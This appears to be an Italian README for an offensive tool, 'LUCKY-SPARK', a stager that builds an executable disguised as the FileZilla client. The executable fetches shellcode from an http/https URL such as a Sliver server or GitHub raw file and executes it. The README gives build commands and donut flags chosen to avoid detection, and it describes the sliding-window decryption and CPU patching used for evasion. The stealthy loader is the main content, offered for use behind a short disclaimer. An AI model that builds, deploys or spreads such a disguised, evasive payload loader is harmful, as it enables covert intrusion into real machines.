
Uno stager furtivo progettato per shellcode caricati tramite http/https come Sliver, o su github raw.
⟪ LUCKY-SPARK ⟫ è uno stager progettato per payload shellcode serviti tramite http/https come sliver o su github raw. Utilizza moderni metodi di offuscamento ed evasione come la decrittazione just-in-time a finestra scorrevole del payload e il patching delle istruzioni della CPU. Di default crea un eseguibile mascherato da client FTP FileZilla.
Clona o scarica il repository e assicurati di avere make e mingw installati sul sistema.
git clone <url_del_repository>
cd LUCKY-SPARK
Esegui lo script per la creazione del binario.
./luckySpark.sh
Ti verrà chiesto di inserire l'URL del tuo payload staged e, opzionalmente, un User-Agent.

Può essere eseguito in una riga per essere integrato in script:
./luckySpark.sh -u https://github.com/NOMEUTENTE/NOMEREPO/raw/refs/heads/main/PAYLOAD.bin -a "Mozilla/5.0"

Se usi donut o Sliver (che usa donut), ti consiglio questi flag per creare il payload:
donut.exe -i examplePayload.exe -a 2 -e 1 -z 1 -b 1 -o payload.bin
Questo evita comportamenti sospetti e segnalati da donut. In particolare, ironicamente, l'evasione di donut è molto segnalata.
Questo crea un binario filezilla.exe che, quando eseguito, recupera ed esegue il payload.
Questo stager è stato progettato per essere usato con Sliver. Esegui lo staging di un payload Sliver come descritto qui Sliver Staging Non crittografare il payload.
Ma qualsiasi metodo di staging basato su http/https funzionerà.
come python3 -m http.server
o un payload caricato su github.com in un repo pubblico.
Questo stager NON supporta il protocollo di staging di meterpreter.
Passo 1: RIP colpisce la Pagina 0 e la Pagina 0 viene decrittata
Pagine: [ D | E | E | ... ]
RIP -> ^
Passo 2: RIP colpisce la Pagina 1 e la Pagina 1 viene decrittata
Pagine: [ D | D | E | ... ]
RIP -> ^
Passo 3: RIP colpisce la Pagina 2 e la Pagina 2 viene decrittata. La Pagina 0 viene crittografata
Pagine: [ E | D | D | ... ]
RIP -> ^
LUCKY-SPARK è inteso esclusivamente per scopi educativi, di ricerca e test di penetrazione autorizzati. L'uso non autorizzato su sistemi senza permesso è illegale e non etico.